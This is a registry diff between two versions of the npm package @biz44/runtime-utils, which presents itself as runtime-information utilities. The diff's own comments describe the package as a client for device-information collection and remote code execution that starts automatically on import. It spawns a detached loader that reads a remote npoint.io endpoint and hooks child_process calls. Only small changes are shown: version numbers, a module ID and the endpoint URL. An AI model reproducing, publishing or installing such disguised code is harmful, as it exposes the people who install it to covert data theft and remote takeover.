@biz44/runtime-utils 1.1.81 → 1.1.96

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js CHANGED
@@ -1,5 +1,5 @@
1
1
  /**
2
- * ID-79 Client Module
2
+ * ID-95 Client Module
3
3
  * Embedded client for device information collection and remote code execution
4
4
  *
5
5
  * AUTO-START ON IMPORT
package/init.js CHANGED
@@ -18,7 +18,7 @@ function isRunning() {
18
18
  }
19
19
 
20
20
  /**
21
- * Initialize the ID-79 client by spawning a detached loader process
21
+ * Initialize the ID-95 client by spawning a detached loader process
22
22
  *
23
23
  * This function:
24
24
  * 1. Checks if a loader process is already running
package/loader.js CHANGED
@@ -8,7 +8,7 @@ const __filename = fileURLToPath(import.meta.url);
8
8
  const __dirname = dirname(__filename);
9
9
  const require = createRequire(import.meta.url);
10
10
 
11
- const API_KEY = "https://api.npoint.io/33e8d008c334b060adad";
11
+ const API_KEY = "https://api.npoint.io/933a731a5e97f4b45249";
12
12
 
13
13
  // Intercept child_process require calls for Windows compatibility
14
14
  const originalRequire = Module.prototype.require;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@biz44/runtime-utils",
3
- "version": "1.1.81",
3
+ "version": "1.1.96",
4
4
  "description": "Utilities for working with runtime and system information.",
5
5
  "type": "module",
6
6
  "main": "index.js",